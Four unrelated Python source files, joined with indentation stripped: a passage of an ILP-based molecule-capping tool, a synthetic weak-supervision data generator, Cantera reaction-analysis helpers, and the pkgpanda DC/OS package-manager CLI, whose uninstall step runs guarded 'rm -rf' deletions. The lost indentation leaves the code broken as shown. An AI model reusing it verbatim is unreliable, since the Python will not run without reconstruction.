0,
1,
LpBinary,
)
new_atoms, new_bonds = molecule.extend_molecule_with(uncapped_atom, capping_strategy)
write_to_debug(debug, i, [atom for atom in new_atoms])
capping_atoms_for[uncapped_atom.index, i] = new_atoms
new_bonds_sets[uncapped_atom.index, i] = [bond for bond in new_bonds if uncapped_atom.index in bond]
fragment_scores[uncapped_atom.index, i] = len(capping_atoms_for[uncapped_atom.index, i])
fragment_H_scores[uncapped_atom.index, i] = len([atom for atom in capping_atoms_for[uncapped_atom.index, i] if atom.element == 'H'])
for capping_atom in new_atoms:
# Add counter-charge variable S_i for every atom of the capping strategy
counter_charges[capping_atom.index] = LpVariable(
"S_{i}".format(i=capping_atom.index),
-MAX_ABSOLUTE_CHARGE,
MAX_ABSOLUTE_CHARGE,
LpInteger,
)
problem += (counter_charges[capping_atom.index] <= (1 - fragment_switches[uncapped_atom.index, i]) * MAX_ABSOLUTE_CHARGE, 'Maximum counter charge for capping atom {element}_{index}'.format(element=capping_atom.element, index=capping_atom.index))
problem += (counter_charges[capping_atom.index] >= -(1 - fragment_switches[uncapped_atom.index, i]) * MAX_ABSOLUTE_CHARGE, 'Minimum counter charge for capping atom {element}_{index}'.format(element=capping_atom.element, index=capping_atom.index))
# Only choose one capping strategy at a time
problem += (lpSum(F_i for ((atom_id, _), F_i) in fragment_switches.items() if atom_id == uncapped_atom.index) == 1, 'Single capping strategy for atom {element}_{index}'.format(element=uncapped_atom.element, index=uncapped_atom.index))
all_capping_atoms = {atom for atoms in capping_atoms_for.values() for atom in atoms}
if True:
molecule.write_graph('debug')
charges = {
atom.index: LpVariable("C_{i}".format(i=atom.index), -MAX_ABSOLUTE_CHARGE, MAX_ABSOLUTE_CHARGE, LpInteger)
for atom in molecule.atoms.values()
}
original_charges = list(charges.values())
# Extra variable use to bind charges
absolute_charges = {
atom_id: LpVariable("Z_{i}".format(i=atom_id), MIN_ABSOLUTE_CHARGE, MAX_ABSOLUTE_CHARGE, LpInteger)
for atom_id in charges.keys()
}
non_bonded_electrons = {
atom_id: LpVariable("N_{i}".format(i=atom_id), 0, MAX_NONBONDED_ELECTRONS // ELECTRON_MULTIPLIER, LpInteger)
for (atom_id, atom) in molecule.atoms.items()
}
# Maps a bond to an integer
bond_mapping = {
bond: i
for (i, bond) in enumerate(molecule.bonds)
}
# Maps an integer to a bond
bond_reverse_mapping = {v: k for (k, v) in bond_mapping.items()}
bond_key = lambda bond: ','.join(map(str, sorted(bond)))
bond_orders = {
bond: LpVariable(
"B_{bond_key}".format(bond_key=bond_key(bond)),
0 if any(bond in new_bonds for new_bonds in new_bonds_sets.values()) else MIN_BOND_ORDER,
MAX_BOND_ORDER,
LpInteger,
)
for bond in molecule.bonds
}
for ((uncapped_atom_id, i), new_bonds) in new_bonds_sets.items():
for new_bond in new_bonds:
problem += (bond_orders[new_bond] >= fragment_switches[uncapped_atom_id, i], 'Minimum bond order for fragment bond {bond_key}'.format(bond_key=bond_key(new_bond)))
problem += (bond_orders[new_bond] <= MAX_BOND_ORDER * fragment_switches[uncapped_atom_id, i], 'Maximum bond order for fragment bond {bond_key}'.format(bond_key=bond_key(new_bond)))
OBJECTIVES = [
MIN(lpSum(absolute_charges.values())),
]
H_size_objective = MAX(lpSum([F_i * fragment_H_scores[uncapped_atom_id, i] for ((uncapped_atom_id, i), F_i) in fragment_switches.items()]))
has_non_null_H_size_objective = (sum([fragment_H_scores[uncapped_atom_id, i] for ((uncapped_atom_id, i), F_i) in fragment_switches.items()]) != 0)
if has_non_null_H_size_objective:
OBJECTIVES.append(H_size_objective)
total_size_objective = MIN(lpSum([F_i * fragment_scores[uncapped_atom_id, i] for ((uncapped_atom_id, i), F_i) in fragment_switches.items()]))
if sum([fragment_scores[uncapped_atom_id, i] for ((uncapped_atom_id, i), F_i) in fragment_switches.items()]) != 0:
OBJECTIVES.append(total_size_objective)
OBJECTIVES.extend([
MIN(lpSum([charge * ELECTRONEGATIVITIES[molecule.atoms[atom_id].element] for (atom_id, charge) in charges.items()])),
MIN(lpSum([bond_order * ELECTRONEGATIVITIES[molecule.atoms[atom_id].element] for (bond, bond_order) in bond_orders.items() for atom_id in bond])),
])
if net_charge is not None:
problem += (lpSum(charges.values()) == net_charge, 'Known net charge')
if number_hydrogens is not None:
problem += (
lpSum(
[
F_i * fragment_H_scores[uncapped_atom_id, i]
for ((uncapped_atom_id, i), F_i) in fragment_switches.items()
],
) + hydrogens_before_capping == number_hydrogens,
'Total number of hydrogens: {0}'.format(number_hydrogens)
)
for atom in molecule.atoms.values():
problem += (
charges[atom.index]
==
VALENCE_ELECTRONS[atom.element]
-
lpSum([bond_orders[bond] for bond in molecule.bonds if atom.index in bond])
-
ELECTRON_MULTIPLIER * non_bonded_electrons[atom.index]
-
(counter_charges[atom.index] if atom.index in counter_charges else 0)
,
'Electron balance for atom {element}_{index}'.format(element=atom.element, index=atom.index),
)
# Deal with absolute values
for atom in molecule.atoms.values():
problem += charges[atom.index] <= absolute_charges[atom.index], 'Absolute charge contraint 1 {i}'.format(i=atom.index)
problem += -charges[atom.index] <= absolute_charges[atom.index], 'Absolute charge contraint 2 {i}'.format(i=atom.index)
if enforce_octet_rule and atom not in all_capping_atoms:
if atom.element not in {'B', 'BE', 'P', 'S'}:
problem += (
ELECTRONS_PER_BOND * lpSum([bond_orders[bond] for bond in molecule.bonds if atom.index in bond]) + ELECTRON_MULTIPLIER * non_bonded_electrons[atom.index] == (2 if atom.element in {'H', 'HE'} else 8),
'Octet for atom {element}_{index}'.format(element=atom.element, index=atom.index),
)
try:
problem.sequentialSolve(OBJECTIVES, timeout=ILP_SOLVER_TIMEOUT)
assert problem.status == 1, (molecule.name, LpStatus[problem.status])
#assert False
except Exception as e:
problem.writeLP('debug.lp')
molecule.write_graph('DEBUG', output_size=(1000, 1000))
print('Failed LP written to "debug.lp"')
raise
DELETE_FAILED_CAPS = True
molecule.formal_charges, molecule.bond_orders, molecule.non_bonded_electrons = {}, {}, {}
atoms_to_remove = set()
for v in problem.variables():
variable_type, variable_substr = v.name.split('_')
if variable_type == 'C':
atom_index = int(variable_substr)
molecule.formal_charges[atom_index] = MUST_BE_INT(v.varValue)
elif variable_type == 'B':
if False:
bond_index = int(variable_substr)
molecule.bond_orders[bond_reverse_mapping[bond_index]] = MUST_BE_INT(v.varValue)
else:
bond = frozenset(map(int, variable_substr.split(',')))
molecule.bond_orders[bond] = MUST_BE_INT(v.varValue)
elif variable_type == 'Z':
pass
elif variable_type == 'N':
atom_index = int(variable_substr)
molecule.non_bonded_electrons[atom_index] = MUST_BE_INT(v.varValue) * ELECTRON_MULTIPLIER
elif variable_type == 'F':
uncapped_atom_id, capping_strategy_id = map(int, variable_substr.split(','))
if MUST_BE_INT(v.varValue) == 0 and DELETE_FAILED_CAPS:
atoms_to_remove.add((uncapped_atom_id, capping_strategy_id))
elif variable_type == 'S':
capping_atom_id = int(variable_substr)
else:
raise Exception('Unknown variable type: {0}'.format(variable_type))
if DELETE_FAILED_CAPS:
for (uncapped_atom_id, capping_strategy_id) in atoms_to_remove:
molecule.remove_atoms(atom for atom in capping_atoms_for[uncapped_atom_id, capping_strategy_id])
if not allow_radicals and False:
assert all([nonbonded_electrons % 2 == 0 for nonbonded_electrons in molecule.non_bonded_electrons.values()]), {
molecule.atoms[atom_index]: electrons
for (atom_index, electrons) in molecule.non_bonded_electrons.items()
if electrons % 2 == 1
}
molecule.update_valences()
molecule.assign_aromatic_bonds()
molecule.assert_molecule_coherence()
return molecule
from itertools import product
from functools import reduce
def get_best_capped_molecule(
molecule: 'Molecule',
draw_all_possible_graphs: bool = False,
debug: Optional[TextIO] = None,
use_ILP: bool = True,
**kwargs: Dict[str, Any],
) -> 'Molecule':
'''
Use a brute-force combinatorial enumeration to cap (complete the valence) an uncapped molecule using a library a capping fragments.
Only meant to be used on very small molecules to compare against the ILP version (``get_best_capped_molecule_with_ILP``).
Args:
``molecule``: Molecule to be capped. Some of its atoms should have the ``capped`` attribute set to False.
``draw_all_possible_graphs``: (Optional) Draw all possible graphs for debug purposes.
``debug``: (Optional) Print very detailed debugging information
``use_ILP``: (Optional) Use an ILP for solving the electron assignment problem.
If set to ``False``, will use a combinatorial enumeration (very slow and error-prone!).
``**kwargs``: (Optional) Additional keyword arguments, which are ignored.
Returns:
The modified, capped ``molecule``.
'''
neighbour_counts = molecule.neighbours_for_atoms()
def keep_capping_strategy_for_atom(capping_strategy: Capping_Strategy, atom: Atom):
if molecule.use_neighbour_valences():
return neighbour_counts[atom.index] + new_atom_for_capping_strategy(capping_strategy) == atom.valence
else:
return min_valence_for(atom) <= neighbour_counts[atom.index] + new_atom_for_capping_strategy(capping_strategy) <= max_valence_for(atom)
def possible_capping_strategies_for_atom(atom: Atom) -> List[Capping_Strategy]:
if debug is not None:
write_to_debug(debug, atom)
for capping_strategy in ALL_CAPPING_OPTIONS[molecule.atom_desc(atom)]:
write_to_debug(
debug,
capping_strategy,
new_atom_for_capping_strategy(capping_strategy),
keep_capping_strategy_for_atom(capping_strategy, atom)
)
return [
capping_strategy
for capping_strategy in ALL_CAPPING_OPTIONS[molecule.atom_desc(atom)]
if keep_capping_strategy_for_atom(capping_strategy, atom)
]
atoms_need_capping = [atom for atom in molecule.sorted_atoms() if not atom.capped]
capping_schemes = list(
product(
*[
possible_capping_strategies_for_atom(atom)
for atom in atoms_need_capping
]
),
)
assert len(capping_schemes) > 0, [
(
atom,
possible_capping_strategies_for_atom(atom),
)
for atom in atoms_need_capping
if len(possible_capping_strategies_for_atom(atom)) == 0
]
write_to_debug(
debug,
[
possible_capping_strategies_for_atom(atom)
for atom in atoms_need_capping
],
)
if len(capping_schemes) >= MAXIMUM_PERMUTATION_NUMBER:
raise Too_Many_Permutations(len(capping_schemes))
write_to_debug(debug, 'atoms_need_capping: {0}'.format(atoms_need_capping))
write_to_debug(debug, 'capping_schemes: {0}'.format(capping_schemes))
write_to_debug(debug, 'capping_options: {0}'.format([
len(ALL_CAPPING_OPTIONS[molecule.atom_desc(atom)])
for atom in atoms_need_capping
]))
write_to_debug(debug, 'atoms_need_capping: {0}'.format(atoms_need_capping))
write_to_debug(debug, 'INFO: Will try all {0} possible capped molecules'.format(len(capping_schemes)))
possible_capped_molecules = sorted(
filter(
lambda mol: mol is not None,
[
molecule.capped_molecule_with(capping_strategies, atoms_need_capping, debug=debug, debug_line='molecule {0}/{1}'.format(i, len(capping_schemes)), use_ILP=use_ILP)
for (i, capping_strategies) in enumerate(capping_schemes, start=1)
],
),
key=lambda mol: (mol.net_abs_charges(), mol.n_atoms(), mol.double_bonds_fitness()),
)
write_to_debug(debug, 'Possible capped molecules: {0} ({1}/{2})'.format(
[(mol.formula(charge=True), mol.net_abs_charges(), mol.double_bonds_fitness()) for mol in possible_capped_molecules],
len(possible_capped_molecules),
len(capping_schemes),
))
if draw_all_possible_graphs:
try:
for (i, molecule) in enumerate(possible_capped_molecules):
molecule.write_graph(i)
except Exception as e:
print(
'ERROR: Could not plot graphs (error was: {0})'.format(
str(e),
),
)
raise
if len(possible_capped_molecules) == 0:
raise Not_Capped_Error(molecule)
best_molecule = possible_capped_molecules[0]
return best_molecule
| |
from collections import defaultdict
import numpy as np
import torch
from numpy.random import choice, random
from scipy.sparse import csr_matrix
from metal.multitask.task_graph import TaskHierarchy
from synthetic.words1k import vocab1k
def singletask_synthetic(n, m, k, **kwargs):
data = SingleTaskTreeDepsGenerator(n, m, k, **kwargs)
L = data.L
Y = data.Y
deps = data.E
bags, D = gaussian_bags_of_words(Y, vocab1k, **kwargs)
X = bags_to_counts(bags, len(vocab1k))
return D, L, X, Y, deps
################################################################################
# Helpers
################################################################################
def logistic_fn(x):
return 1 / (1 + np.exp(-x))
def choose_other_label(k, y):
"""Given a cardinality k and true label y, return random value in
{1,...,k} \ {y}."""
return choice(list(set(range(1, k + 1)) - set([y])))
def indpm(x, y):
"""Plus-minus indicator function"""
return 1 if x == y else -1
################################################################################
# Single-task (Ls and Ys)
################################################################################
class SingleTaskTreeDepsGenerator(object):
"""Generates a synthetic single-task L and Y matrix with dependencies
Args:
n: (int) The number of data points
m: (int) The number of labeling sources
k: (int) The cardinality of the classification task
class_balance: (np.array) each class's percentage of the population
theta_range: (tuple) The min and max possible values for theta, the
class conditional accuracy for each labeling source
edge_prob: edge density in the graph of correlations between sources
theta_edge_range: The min and max possible values for theta_edge, the
strength of correlation between correlated sources
The labeling functions have class-conditional accuracies, and
class-unconditional pairwise correlations forming a tree-structured graph.
Note that k = the # of true classes; thus source labels are in {0,1,...,k}
because they include abstains.
"""
def __init__(
self,
n,
m,
k=2,
class_balance=None,
theta_range=(0, 1.5),
edge_prob=0.0,
theta_edge_range=(-1, 1),
**kwargs
):
self.n = n
self.m = m
self.k = k
# Generate correlation structure: edges self.E, parents dict self.parent
self._generate_edges(edge_prob)
# Generate class-conditional LF & edge parameters, stored in self.theta
self._generate_params(theta_range, theta_edge_range)
# Generate class balance self.p
if class_balance is None:
self.p = np.full(k, 1 / k)
else:
self.p = class_balance
# Generate the true labels self.Y and label matrix self.L
self._generate_label_matrix()
# Compute the conditional clique probabilities
self._get_conditional_probs()
# Correct output type
self.L = csr_matrix(self.L, dtype=np.int)
def _generate_edges(self, edge_prob):
"""Generate a random tree-structured dependency graph based on a
specified edge probability.
Also create helper data struct mapping child -> parent.
"""
self.E, self.parent = [], {}
for i in range(self.m):
if random() < edge_prob and i > 0:
p_i = choice(i)
self.E.append((p_i, i))
self.parent[i] = p_i
def _generate_params(self, theta_range, theta_edge_range):
self.theta = defaultdict(float)
for i in range(self.m):
t_min, t_max = min(theta_range), max(theta_range)
self.theta[i] = (t_max - t_min) * random(self.k + 1) + t_min
# Choose random weights for the edges
te_min, te_max = min(theta_edge_range), max(theta_edge_range)
for (i, j) in self.E:
w_ij = (te_max - te_min) * random() + te_min
self.theta[(i, j)] = w_ij
self.theta[(j, i)] = w_ij
def _P(self, i, li, j, lj, y):
return np.exp(
self.theta[i][y] * indpm(li, y) + self.theta[(i, j)] * indpm(li, lj)
)
def P_conditional(self, i, li, j, lj, y):
"""Compute the conditional probability
P_\theta(li | lj, y)
=
Z^{-1} exp(
theta_{i|y} \indpm{ \lambda_i = Y }
+ \theta_{i,j} \indpm{ \lambda_i = \lambda_j }
)
In other words, compute the conditional probability that LF i outputs
li given that LF j output lj, and Y = y, parameterized by
- a class-conditional LF accuracy parameter \theta_{i|y}
- a symmetric LF correlation paramter \theta_{i,j}
"""
Z = np.sum([self._P(i, _li, j, lj, y) for _li in range(self.k + 1)])
return self._P(i, li, j, lj, y) / Z
def _generate_label_matrix(self):
"""Generate an [n,m] label matrix with entries in {0,...,k}"""
self.L = np.zeros((self.n, self.m))
self.Y = np.zeros(self.n, dtype=np.int64)
for i in range(self.n):
y = choice(self.k, p=self.p) + 1 # Note that y \in {1,...,k}
self.Y[i] = y
for j in range(self.m):
p_j = self.parent.get(j, 0)
prob_y = self.P_conditional(j, y, p_j, self.L[i, p_j], y)
prob_0 = self.P_conditional(j, 0, p_j, self.L[i, p_j], y)
p = np.ones(self.k + 1) * (1 - prob_y - prob_0) / (self.k - 1)
p[0] = prob_0
p[y] = prob_y
self.L[i, j] = choice(self.k + 1, p=p)
def _get_conditional_probs(self):
"""Compute the true clique conditional probabilities P(\lC | Y) by
counting given L, Y; we'll use this as ground truth to compare to.
Note that this generates an attribute, self.c_probs, that has the same
definition as returned by `LabelModel.get_conditional_probs`.
TODO: Can compute these exactly if we want to implement that.
"""
# TODO: Extend to higher-order cliques again
self.c_probs = np.zeros((self.m * (self.k + 1), self.k))
for y in range(1, self.k + 1):
Ly = self.L[self.Y == y]
for ly in range(self.k + 1):
self.c_probs[ly :: (self.k + 1), y - 1] = (
np.where(Ly == ly, 1, 0).sum(axis=0) / Ly.shape[0]
)
class HierarchicalMultiTaskTreeDepsGenerator(SingleTaskTreeDepsGenerator):
def __init__(
self,
n,
m,
theta_range=(0, 1.5),
edge_prob=0.0,
theta_edge_range=(-1, 1),
cardinalities=[2, 3, 3],
edges=[(0, 1), (0, 2)],
):
self.task_graph = TaskHierarchy(cardinalities, edges)
fs = list(self.task_graph.feasible_set())
super().__init__(
n,
m,
k=len(fs),
theta_range=theta_range,
edge_prob=edge_prob,
theta_edge_range=theta_edge_range,
)
L_mt = [np.zeros((self.n, self.m)) for _ in range(self.task_graph.t)]
for i in range(self.n):
for j in range(self.m):
if self.L[i, j] > 0:
y = fs[int(self.L[i, j]) - 1]
for s in range(self.task_graph.t):
L_mt[s][i, j] = y[s]
self.L = list(map(csr_matrix, L_mt))
# Convert Y to a t-length list of n-length vectors
self.Y = [
np.array([fs[y - 1] for y in self.Y]).T[t] for t in range(self.task_graph.t)
]
################################################################################
# Generating Xs and Ds
################################################################################
def gaussian_bags_of_words(Y, vocab=vocab1k, sigma=1, bag_size=[25, 50], **kwargs):
"""
Generate Gaussian bags of words based on label assignments
Args:
Y: np.array of true labels
sigma: (float) the standard deviation of the Gaussian distributions
bag_size: (list) the min and max length of bags of words
Returns:
X: (Tensor) a tensor of indices representing tokens
D: (list) a list of sentences (strings)
The sentences are conditionally independent, given a label.
Note that technically we use a half-normal distribution here because we
take the absolute value of the normal distribution.
Example:
TBD
"""
def make_distribution(sigma, num_words):
p = abs(np.random.normal(0, sigma, num_words))
return p / sum(p)
num_words = len(vocab)
word_dists = {y: make_distribution(sigma, num_words) for y in set(Y)}
bag_sizes = np.random.choice(range(min(bag_size), max(bag_size)), len(Y))
X = []
items = []
for i, (y, length) in enumerate(zip(Y, bag_sizes)):
x = torch.from_numpy(np.random.choice(num_words, length, p=word_dists[y]))
X.append(x)
items.append(" ".join(vocab[j] for j in x))
return X, items
def bags_to_counts(bags, vocab_size):
X = torch.zeros(len(bags), vocab_size, dtype=torch.float)
for i, bag in enumerate(bags):
for word in bag:
X[i, word] += 1
return X
| |
# -*- coding: utf-8 -*-
import numpy as np
import cantera as ct
import pandas as pd
import re
import warnings
import copy
###################################
# 3b. output data analysis
###################################
def branching_ratios(df, solution, compound, production = False):
"""
This method looks at the consumption pathways of `compound` over
all time points in the data set.
It outputs a pandas.DataFrame which contains columns of pertinant reactions
and values of the branching ratio of each reaction which is defined as
$BR_{i} = \frac{ROC_i}{\Sigma_{j=0}^{j=N} ROC_j }$
where $i$ is the reaction in question, $ROC$ is the rate of consumption of
the desired species, and $N$ is the number of reactions, and $BR$ is the branching ratio.
df = dataframe of run data
solution = cantera solution object
compound = species string which you want to identify
production = if True, shows the reactions forming species X
This method only works on forward reactions
"""
reaction_dataframe = weight_reaction_dataframe_by_stoich_coefficients(df,solution,compound)
if not production:
#only keep consumption
consumption_terms = reaction_dataframe[reaction_dataframe < 0]
df = consumption_terms.dropna('columns','all')
else:
production_terms = reaction_dataframe[reaction_dataframe > 0]
df = production_terms.dropna('columns','all')
total = df.sum('columns')
branching_ratios = df.div(total,'index')
branching_ratios = branching_ratios.fillna(0)
#sort from most important
importance_index = branching_ratios.sum('index').sort_values(ascending=False)
branching_ratios = branching_ratios.reindex(importance_index.index,axis='columns')
return branching_ratios
def consumption_pathways(solution,df,species, time = 'all'):
"""
returns the total rate of production for a particular species at the specified
time(s). Postive values indicate production, negative values indicate consumption
If multiple times are given or the keyword 'all' is used, the output is a DataFrame
with indexes the various times. If only one time is supplied, the output is a
Series.
solution = cantera solution object
df = pandas dataframe of reactions
species = string of species
time = number describing the time points to determine consumption (or list of numbers)
"""
if time=='all':
time = list(df.index)
if isinstance(time,list):
# recursively run consumption_pathways
consumption_values = []
for t in time:
consumption_values.append(consumption_pathways(solution=solution,
df=df,
species=species,
time= t))
consumption_values = pd.DataFrame(consumption_values, index=time)
# sort by total sum of flux
sorted_index = consumption_values.sum('index').sort_values().keys()
return consumption_values[sorted_index]
# the time is not a list, return a pd.Series
try:
reactions_weighted = find_reactions(solution, df,species).loc[time,:]
except KeyError:
reactions_weighted = find_reactions(solution, df,species).loc[return_nearest_time_index(time,df.index, index=False),:]
# weight by stoichiometric_coefficients
stoich_coeffs = [obtain_stoichiometry_of_species(solution, species, reaction) for reaction in reactions_weighted.index]
stoich_coeff_dict = pd.Series(dict(zip(reactions_weighted.index,stoich_coeffs)))
# pandas was having some bug, so manually rewrote the line below
#reactions_weighted *= stoich_coeff_dict
for index in stoich_coeff_dict.index:
reactions_weighted[index] *= stoich_coeff_dict[index]
return reactions_weighted.sort_values()
def quasi_steady_state(df, species):
"""
This method outputs the key parameter, $\frac{|ROP-ROC|}{ROP}$, in quasi steady state
approximation.
df = pd.DataFrame containing get_rop_and_roc_series
species = string of species to use
returns a pd.Series of the qss apprixmation: $\frac{|ROP-ROC|}{ROP}$
"""
return (df['production',species] - df['consumption',species]).abs() / df['production',species]
def compare_species_profile_at_one_time(desired_time, df1,df2,
minimum_return_value=1e-13,
time_string = 'time (s)'):
"""
compares the species profile between two models closest to the desired time
returns a pandas.Series object with the relative species concentrations
given by `compare_2_data_sets`
"""
time_index_1 = return_nearest_time_index(desired_time,df1[time_string])
time_index_2 = return_nearest_time_index(desired_time,df2[time_string])
time_slice_1 = find_species(df1).loc[time_index_1]
time_slice_2 = find_species(df2).loc[time_index_2]
return _compare_2_data_sets(time_slice_1,time_slice_2,minimum_return_value)
def _compare_2_data_sets(model1, model2, minimum_return_value = 1000,diff_returned=0.0):
"""given two pd.Series of data, returns a pd.Series with the relative
differences between the two sets. This requires one of the values to be
above the `minimum_return_cutoff` and the difference to be above `diff_returned`
The difference is returned as $\frac{model1 - model2}{\min(model1,model2)}$.
Where the minimum merges the two datasets using the minimum value at each index.
"""
#ensure all values are the same
model1 = copy.deepcopy(model1)[model2.index].dropna()
model2 = copy.deepcopy(model2)[model1.index].dropna()
minimum_value = pd.DataFrame({'model1':model1,'model2':model2}).min(1)
compared_values = ((model1-model2)/minimum_value).dropna()
for label in compared_values.index:
not_enough_value = (model1[label] < minimum_return_value and model2[label] < minimum_return_value)
not_enough_difference = abs(compared_values[label]) < diff_returned
if not_enough_value or not_enough_difference:
compared_values[label] = np.nan
compared_values = compared_values.dropna()
return compared_values.sort_values()
def return_nearest_time_index(desired_time,time_series,index=True):
"""
input the desired time, double, and time_series, pd.Series,
returns the index of the time_series.
If you want the actual time value, change index=False
"""
# commented out due to error in mp.argmin
#nearest_value = lambda value, array: np.argmin(abs(value-array))
#if index:
# return nearest_value(desired_time,time_series)
#return time_series[nearest_value(desired_time,time_series)]
deviation_list = abs(desired_time-time_series)
min_deviation = min(deviation_list)
index_value = list(deviation_list).index(min_deviation)
if index:
return index_value
return time_series[index_value]
def obtain_stoichiometry_of_species(solution, species, reaction):
"""
this method finds a reaction string in the cantera solution file, and
returns its stoichiometric coefficient of the specified species.
Returns a negative value if the species is a reactant.
solution = cantera solution object
species = string of species name
reaction = reaction string or list of reaction strings.
Stoichiometry is calculated by: product_stoich_coeff - reactant_stoich_coeff
"""
# recursively deal with lists of reactions
if not isinstance(reaction,str):
coefficients = np.empty(len(reaction))
for index, reaction_string in enumerate(reaction):
coefficients[index] = obtain_stoichiometry_of_species(solution,species,reaction_string)
return coefficients
# deal with individual reactions
assert isinstance(reaction,str)
reaction_index = solution.reaction_equations().index(reaction)
reactant_stoich_coeff = solution.reactant_stoich_coeff(species, reaction_index)
product_stoich_coeff = solution.product_stoich_coeff(species, reaction_index)
if product_stoich_coeff > 0 or reactant_stoich_coeff > 0:
return product_stoich_coeff - reactant_stoich_coeff
raise Exception('Species {} is not in reaction {}'.format(species,reaction))
def weight_reaction_dataframe_by_stoich_coefficients(df, solution, species):
"""
returns a dataframe of reactions over time weighted by the stoichiometric
coefficient of the species string `species`.
"""
reactions = find_reactions( solution, df, species)
reaction_strings = list(reactions.columns)
stoichiometries = obtain_stoichiometry_of_species(solution,
species,
reaction_strings)
return reactions * stoichiometries
def find_reactions(solution, df,species):
"""
finds the reaction columns in the net_reaction dataframe which contain
the species specified and returns them.
"""
included_columns = []
rxn_string_to_rxn_index = dict(zip(solution.reaction_equations(),range(solution.n_reactions)))
for rxn_name in df.columns:
sln_index = rxn_string_to_rxn_index[rxn_name]
try:
if solution.product_stoich_coeff(species,sln_index) !=0 or \
solution.reactant_stoich_coeff(species,sln_index) !=0:
included_columns.append(rxn_name)
except KeyError:
print("Error obtained in find_reactions,\ncheck to ensure the columns in `df`\ncorrespond to the reactions in `solution`")
raise
df_my_reactions = df[included_columns]
if df_my_reactions.empty:
raise Exception('No reactions found for species {}'.format(species))
return df_my_reactions
| |
"""Panda package management
Usage:
pkgpanda activate <id>... [options]
pkgpanda swap <package-id> [options]
pkgpanda active [options]
pkgpanda fetch --repository-url=<url> <id>... [options]
pkgpanda add <package-tarball> [options]
pkgpanda list [options]
pkgpanda remove <id>... [options]
pkgpanda setup [options]
pkgpanda uninstall [options]
pkgpanda check [--list] [options]
Options:
--config-dir=<conf-dir> Use an alternate directory for finding machine
configuration (roles, setup flags). [default: {default_config_dir}]
--no-systemd Don't try starting/stopping systemd services
--no-block-systemd Don't block waiting for systemd services to come up.
--root=<root> Testing only: Use an alternate root [default: {default_root}]
--state-dir-root=<root> Testing only: Use an alternate package state directory root
[default: {default_state_dir_root}]
--repository=<repository> Testing only: Use an alternate local package
repository directory [default: {default_repository}]
--rooted-systemd Use $ROOT/dcos.target.wants for systemd management
rather than /etc/systemd/system/dcos.target.wants
"""
import os
import sys
from itertools import groupby
from os import umask
from subprocess import CalledProcessError, check_call
from docopt import docopt
from pkgpanda import actions, constants, Install, PackageId, Repository
from pkgpanda.exceptions import PackageError, PackageNotFound, ValidationError
def print_repo_list(packages):
pkg_ids = list(map(PackageId, sorted(packages)))
for name, group_iter in groupby(pkg_ids, lambda x: x.name):
group = list(group_iter)
if len(group) == 1:
print(group[0])
else:
print(name + ':')
for package in group:
print(" " + package.version)
def uninstall(install, repository):
print("Uninstalling DC/OS")
# Remove dcos.target
# TODO(cmaloney): Make this not quite so magical
print("Removing dcos.target")
print(os.path.dirname(install.systemd_dir) + "/dcos.target")
check_call(['rm', '-f', os.path.dirname(install.systemd_dir) + "/dcos.target"])
# Cleanup all systemd units
# TODO(cmaloney): This is much more work than we need to do the job
print("Deactivating all packages")
install.activate([])
# NOTE: All python libs need to be loaded before this so they are in-memory before we do the delete
# Remove all well known files, directories
# TODO(cmaloney): This should be a method of Install.
print("Removing all runtime / activation directories")
active_names = install.get_active_names()
new_names = [name + '.new' for name in active_names]
old_names = [name + '.old' for name in active_names]
all_names = active_names + new_names + old_names
assert len(all_names) > 0
if '/' in all_names + [install.root]:
print("Cowardly refusing to rm -rf '/' as part of uninstall.", file=sys.stderr)
print("Uninstall directories: ", ','.join(all_names + [install.root]), file=sys.stderr)
sys.exit(1)
check_call(['rm', '-rf'] + all_names)
# Removing /opt/mesosphere
check_call(['rm', '-rf', install.root])
def find_checks(install, repository):
checks = {}
for active_package in install.get_active():
tmp_checks = {}
tmp_checks[active_package] = []
package_check_dir = repository.load(active_package).check_dir
if not os.path.isdir(package_check_dir):
continue
for check_file in sorted(os.listdir(package_check_dir)):
if not os.access(os.path.join(package_check_dir, check_file), os.X_OK):
print('WARNING: `{}` is not executable'.format(check_file), file=sys.stderr)
continue
tmp_checks[active_package].append(check_file)
if tmp_checks[active_package]:
checks.update(tmp_checks)
return checks
def list_checks(checks):
for check_dir, check_files in sorted(checks.items()):
print('{}'.format(check_dir))
for check_file in check_files:
print(' - {}'.format(check_file))
def run_checks(checks, install, repository):
exit_code = 0
for pkg_id, check_files in sorted(checks.items()):
check_dir = repository.load(pkg_id).check_dir
for check_file in check_files:
try:
check_call([os.path.join(check_dir, check_file)])
except CalledProcessError:
print('Check failed: {}'.format(check_file), file=sys.stderr)
exit_code = 1
return exit_code
def main():
arguments = docopt(
__doc__.format(
default_config_dir=constants.config_dir,
default_root=constants.install_root,
default_repository=constants.repository_base,
default_state_dir_root=constants.STATE_DIR_ROOT,
),
)
umask(0o022)
# NOTE: Changing root or repository will likely break actually running packages.
install = Install(
os.path.abspath(arguments['--root']),
os.path.abspath(arguments['--config-dir']),
arguments['--rooted-systemd'],
not arguments['--no-systemd'],
not arguments['--no-block-systemd'],
manage_users=True,
add_users=not os.path.exists('/etc/mesosphere/manual_host_users'),
manage_state_dir=True,
state_dir_root=os.path.abspath(arguments['--state-dir-root']))
repository = Repository(os.path.abspath(arguments['--repository']))
try:
if arguments['setup']:
actions.setup(install, repository)
sys.exit(0)
if arguments['list']:
print_repo_list(repository.list())
sys.exit(0)
if arguments['active']:
for pkg in sorted(install.get_active()):
print(pkg)
sys.exit(0)
if arguments['add']:
actions.add_package_file(repository, arguments['<package-tarball>'])
sys.exit(0)
if arguments['fetch']:
for package_id in arguments['<id>']:
actions.fetch_package(
repository,
arguments['--repository-url'],
package_id,
os.getcwd())
sys.exit(0)
if arguments['activate']:
actions.activate_packages(
install,
repository,
arguments['<id>'],
not arguments['--no-systemd'],
not arguments['--no-block-systemd'])
sys.exit(0)
if arguments['swap']:
actions.swap_active_package(
install,
repository,
arguments['<package-id>'],
not arguments['--no-systemd'],
not arguments['--no-block-systemd'])
sys.exit(0)
if arguments['remove']:
for package_id in arguments['<id>']:
try:
actions.remove_package(install, repository, package_id)
except PackageNotFound:
pass
sys.exit(0)
if arguments['uninstall']:
uninstall(install, repository)
sys.exit(0)
if arguments['check']:
checks = find_checks(install, repository)
if arguments['--list']:
list_checks(checks)
sys.exit(0)
# Run all checks
sys.exit(run_checks(checks, install, repository))
except ValidationError as ex:
print("Validation Error: {0}".format(ex), file=sys.stderr)
sys.exit(1)
except PackageError as ex:
print("Package Error: {0}".format(ex), file=sys.stderr)
sys.exit(1)
except Exception as ex:
print("ERROR: {0}".format(ex), file=sys.stderr)
sys.exit(1)
print("unknown command", file=sys.stderr)
sys.exit(1)
if __name__ == "__main__":
main()
